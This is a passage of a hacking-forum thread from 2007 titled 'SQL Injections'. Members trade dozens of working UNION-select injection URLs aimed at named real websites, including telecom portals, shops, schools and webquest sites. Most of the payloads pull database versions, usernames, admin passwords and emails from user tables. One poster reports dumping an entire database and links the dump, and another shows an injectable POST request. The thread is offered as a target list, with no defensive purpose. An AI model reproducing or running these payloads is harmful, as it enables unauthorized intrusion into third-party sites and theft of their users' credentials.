SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    MTS Ukraine (WAP)

    http://wap.buffer.mts.com.ua/ custom_cards/mtswap/show.php? type=xh tml&lang=ru&id=-14470+union+select+1,2,concat(version(),0x3a,user(),0x3a,database( )),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*



    online store


    Code:


    http://www.alo-alo.ru/news.phtml?t=3&idn=-23+union+select+1,concat(column_name,char(58),table_name),3,4+from+information_schema.columns/*
     
    #3081 sasTO, 13 Sep 2007
    Last edited: 13 Sep 2007
    1 person likes this.
  2. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    3 hosting accounts, version 4 :'(
     
    1 person likes this.
  3. lsass.exe

    lsass.exe Elder

    Joined:
    5 Aug 2007
    Messages:
    156
    Likes Received:
    161
    Reputations:
    24
    http://radiorecord.ru/news/?id=-1+union+select+1,database(),3,version()/*

    http://tikhvin.spb.ru/view.php?bn=a_articles&key=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,userid,17,password,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+a_users/*&for=
     
    2 people like this.
  4. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    WAP.MOBILNIK.UA


    Code:


    http://wap.mobilnik.ua/news.php?act=full&id=-12168%27+union+select+1,concat(pass,char(58),email,char(58),name),3,4,5,6,7,8,9,10+from+sub_user+limit+46,1/*

    please, help! How do you develop an SQL injection like this one further?

    Code:
    http://www.copris.com/pinboard/cgi-bin/nameanon_r.idc?Canonce=1'
     
    1 person likes this.
  5. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.alalbany.ws/search/view.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5/*  albws_albws@localhost:4.1.22-standard:albws_albwsch
    Code:
    http://www.eitan.ws/publicaciones/ver_publicaciones.php?id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database())/*  [email protected]:5.0.22-max:eitan
     
    2 people like this.
  6. lsass.exe

    lsass.exe Elder

    Joined:
    5 Aug 2007
    Messages:
    156
    Likes Received:
    161
    Reputations:
    24
    http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,email,6,password,password,9,10,login,12+from+users+limit+2,6/*

    I also wrote a parser and pulled the whole database
    http://lsass.us/uptime.ru.txt
     
    1 person likes this.
  7. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Online store of digital electronics =\
    Code:
    htp://cyfra. com.ua/options?id= 9999+union+se lect+1,concat(user(),0x3a,version(),0x3a,database())/*
    cyfra@localhost:5.0.24a-Debian_9-log:cyfra
     
  8. I0gen

    I0gen Elder

    Joined:
    15 Aug 2007
    Messages:
    76
    Likes Received:
    33
    Reputations:
    10
    http://www.teachandtic.es/webquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.rosanemello.pro.br/webquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.inovar.pt/cre/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.cfpa.pt/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.maiaexperimental.net/webquests/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.manuelfariasousa.pt/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.projectos.esffl.pt/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.ebivc.org/webquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.api.adm.br/phpwebquest_2_international/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.capag.info/wq/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.cf-terras-feira.org/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario
     
    2 people like this.
  9. Dagon

    Dagon Elder

    Joined:
    27 Mar 2006
    Messages:
    57
    Likes Received:
    24
    Reputations:
    8
    _http://www.vanta.ru/script/catalog.php?cat=-1%20union%20select%201,USER()/*
     
    1 person likes this.
  10. AdReNa1!Ne

    AdReNa1!Ne Elder

    Joined:
    24 May 2007
    Messages:
    70
    Likes Received:
    105
    Reputations:
    14
    POST http://smspaymer.com:80/index.php HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
    Host: smspaymer.com
    Content-Length: 121
    Cookie: reg_num=160517
    Connection: Close
    Pragma: no-cache

    step=1&my_country=[sql_inj]&[email protected]&my_phone=79260001144&nextstep=%CF%F0%EE%E4%EE%EB%E6%E8%F2%FC

    Injection via a POST request
     
    2 people like this.
  11. SWAT

    SWAT Elder

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.whathaseuropedone.org.uk/topic_detail.php?topic_id=-13+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12+from+partners/*
    Code:
    http://hyipcredit.com/forum/topic_detail.php?id=-2%20UNION%20SELECT%201,2,3,admin_password,5,username,7,8%20From%20admin/*
    Code:
    http://www.monetary-code.com/forum/topic_detail.php?id=-92%20UNION%20SELECT%201,2,3,admin_password,5,username,7,8%20From%20admin/*
    Code:
    http://www.afsnetworks.com/news.php?id=-70+union+select+1,2,concat(id,0x3a,username,0x3a,passwd),4,5,6,7,8,9,10,11,12+from+users/*
     
    #3091 SWAT, 15 Sep 2007
    Last edited: 15 Sep 2007
    1 person likes this.
  12. SkyMan

    SkyMan New Member

    Joined:
    3 Dec 2006
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    http://kinosbornik.ru/search.php?sort=zhanr&zhanrid=1'
     
  13. SWAT

    SWAT Elder

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    http://kinosbornik.ru/search.php?sort=zhanr&zhanrid=-1+union+select+table_name+from+INFORMATION_SCHEMA.TABLES/*
     
    1 person likes this.
  14. c001er*

    c001er* Elder

    Joined:
    15 Jun 2007
    Messages:
    20
    Likes Received:
    18
    Reputations:
    0
    http://www.gnarlsbarkley.com/cms/news/news_view_comments_list.php?id=38+limit+0+union+select+1,777,1,1,1,1/*

    http://www.casino-games-internet.com/it/guida.php?ID=527+limit+0+union+select+1,1,version(),1222,1444,1,1,1,1,1,1/*
     
    #3094 c001er*, 16 Sep 2007
    Last edited: 16 Sep 2007
    1 person likes this.
  15. _GaLs_

    _GaLs_ Elder

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Code:
    http://www.basketball.ru/netcat/modules/user/profile.php?userid=-1+union+select+1,2,3,,5,Version(),7,8/*
    Code:
    http://cidoc.ics.forth.gr/issues.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,10/*
     
    2 people like this.
  16. c001er*

    c001er* Elder

    Joined:
    15 Jun 2007
    Messages:
    20
    Likes Received:
    18
    Reputations:
    0
    HTML:
    http://www.toumaz.com/news/news.php?id=26+limit+0+union+select+1,1,2,2,3,user()/*
     
    1 person likes this.
  17. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.tmf.ukim.edu.mk/subview2.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),4/*
    http://www.tmf.ukim.edu.mk/mjcce/default.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),5,6,7,8,9,10,11,12,13,14/*&start=0
    Code:
    http://shqip-toplevel.schools.edu.mk/dynamicpage.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),3,4,5,6,7,8,9,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(DATABASE(),0x71),0x71),12,13/*
     
  18. Helios

    Helios Elder

    Joined:
    14 Jan 2007
    Messages:
    414
    Likes Received:
    180
    Reputations:
    103
    http://mebelsm.ru/index.php?sect=cat&catid=64&prod_id=-1+union+select+1,2,3,4,5,user(),7,8,9/*

    There is more there, but I did not have time to dig around
     
    1 person likes this.
  19. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Code:
    http://www.btb.cc/adetail.php?id=-881+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
     
    2 people like this.
  20. z01b

    z01b Mujahid

    Joined:
    5 Jan 2007
    Messages:
    494
    Likes Received:
    382
    Reputations:
    22
    http://www.energyagency.org.uk/news.php?id=-1+union+select+0,1,2,3,4,5/*
    http://www.impact.org/news.php?id=-1+union+select+0,1,2,3,user(),5,version(),7
     
    #3100 z01b, 16 Sep 2007
    Last edited: 16 Sep 2007